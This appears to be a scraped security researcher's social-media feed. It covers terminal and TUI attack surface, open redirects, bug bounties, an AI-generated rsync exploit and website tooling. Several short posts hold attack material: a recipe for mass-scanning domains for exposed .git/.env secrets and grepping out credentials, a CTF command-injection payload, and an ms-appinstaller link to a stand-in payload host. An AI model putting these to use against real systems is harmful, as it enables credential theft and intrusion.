siddharth

@lefunny87104 @tlhIngan_qoH @brian_pak I am pretty sure 'mount' exists on Android.

@tlhIngan_qoH @brian_pak any of these in Android?

Time to talk about this one. CopyFail (CVE-2026-31431) — a 732-byte Python script that roots every Linux distro shipped since 2017. 🧵

@rootxharsh Many of these TUI email clients are probably prone to ANSI escape sequence injections allowing for easy phishing attacks. LLMs make pretty TUIs and terminal emulators are becoming like a web browser. More research is needed to secure both the terminal emulators and TUI clients.

half these new email clients/terminals/browsers are just unaudited attack surface with nicer UI/UX. get pwned.

@ibuildthecloud @googlemaps You may want to check the "Google open redirect" section here: ndevtk.github.io/writeups/2024/…

You gotta be kidding me. Google Maps has an open redirect URL? I just got this phishing link. What the heck. @googlemaps do you not treat this as a major security issue?

Found a command execution vulnerability in Kitty and xfce4-terminal's drag-and-drop functionality sdushantha.github.io/post/drop-it-l…

@Yogehi Great job!

@sidheart Yeah I'd say so

Yay3段Yay

@XorNinja You may get some interesting results if you give it POC||GTFO articles. This repo contains all of the articles. It may be wise to use the non-polyglot versions of the PDFs so that Claude can process the content more efficiently. github.com/angea/pocorgtfo

MAD Bugs: Feeding Claude Phrack Articles for Fun and Profit A teammate gave Claude a Phrack article. It built a working rsync RCE on x86-64. He shared the generated exploit with me but forgot one file, and I needed it on ARM64 anyway. I gave Claude one prompt: reproduce this. Ninety minutes later it dropped a working exploit. I told it the exploit was slow (5 minutes); it made it 20x faster. We also asked it to audit the patched rsync, and it came back with new bugs. blog.calif.io/p/mad-bugs-fee…

@i30clip Sideloading Airshou through a MDM profile or Cydia Impactor for screenrecording were the days.

y’all wasn’t there fr

@rtwlz For those wondering how the data may have been fetched. 1. Share your MS calendar with yourself. 2. Copy the reachcalendar.ics url in ICalUrl from the sharing_metadata.xml you get sent. 3. Use a iCal parser library to parse the data (icalevents for Python).

made my computer dramatically play BBC news music before every meeting

@RBTree_ I joined yesterday and enjoy it. Would highly recommend it!

Should I try AlpacaHack :thinking:

@EvilRabbitSec Its a weird bug that occurs with Electron applications on Wayland. Depending on how you installed Spotify, one of these solutions may work for you. bbs.archlinux.org/viewtopic.php?…

@Coins trufflehog may work a little better as you dont have to manually write your own regex. Just execute "trufflehog filesystem <path>". github.com/trufflesecurit…

when you have a treasure trove familiarize yourself with grep / strings etc searching for common config data related to smtp_, db_, database_, api_ etc eg: "smtp_(host|user|username|pass|password|port)"

Grab yourself a list of a few million domains Write a quick scanner that'll search for .git & .env Spend a few hours sifting through your treasure Repeat the same thing while enumerating subdomains Enjoy 🥂

@MachIaVellill What was your payload? Your solution seems much cleaner than mine. \x03 cd .. \x0d cd app \x0d cat flag.txt

@d4d89704243 Excellent research!

Think you’ve seen every OS command injection trick? Think again, read our latest blog post! Link in the comments👇

@Fawnstalker @nsg650 I tried using the ms-appinstaller URI in a fresh Win11 VM and it said that it's disabled by default.

@nsg650 More like ms-appinstaller://?source=evilpayload.xyz to install an untrusted app

Did they just receive someone putting calculator:// in md file opening it in notepad and then seeing the calculator spawn open when the link is clicked and call that RCE??

@vxunderground I dont fully understand how this is a RCE. POC shows ms-appinstaller:// and file:// being used. App Installer is disabled by default and file:// doesn't allow arguments. If this is seen as a RCE, then don't we also have a RCE through hyperlinks in the Terminal app?

The new AI powered Notepad on Windows 11 was found having a Remote Code Execution 0day Hot take: text editors don't need network functionality msrc.microsoft.com/update-guide/v…

@LinkofSunshine I think of that post everytime I see the repo on my profile. I'm the creator of Sherlock btw.

I think about this Reddit post every single time I clone something from GitHub

@zachkrall An alternative is to create a website without a lot of fancy styling and then use a TUI web browser to view the page. I enjoy using chawan as my TUI web browser as it supports vi like keys. Try it out yourself! chawan.net cha sdushantha.github.io

the terminal is quietly becoming one of the most interesting surfaces in interaction design i've been experimenting with what a personal website feels like when it lives in the terminal instead of a browser

@brutecat Great job! Do you have any resources on how to do AI driven API fuzzing? I've attempted to use LLMs to create wordlists using context of the application and API endpoint, but it hasn't properly worked for me.

Grateful to make Google's 0x0A. ~$233k in bounties since October (~$270k total, more pending), largely from AI-driven API fuzzing. Not a full-time bug hunter but focused on real-world server-side PII impact.

@Zahar0n_ @pashov @zachxbt There sure is! I've done ethical social engineering in physical pentests and phishing engagements at work. Check out @sec_defcon's Cold Call events at @defcon to practice vishing in a safe environment. They also host vishing competitions.

@pashov @zachxbt They probably use social engineering rather than “code” hacking is there a field for ethical social engineers tho?

All of the young guys that @zachxbt catches really took the wrong path by choosing the dark side. It's a mistake. They showed smartness, figuring out how to make "an exploit", but didn't consider what is right and what is wrong. All these guys should just be ethical hackers.

@techspence I use my own static site generator which is written in Bash and uses Pandoc convert all my posts written in Markdown to HTML. I do use HTML or JS in the same file if absolutely needed. Site: sdushantha.github.io Repo: github.com/sdushantha/sdu…

My personal website really needs a refresh. What are yall using for personal websites now days?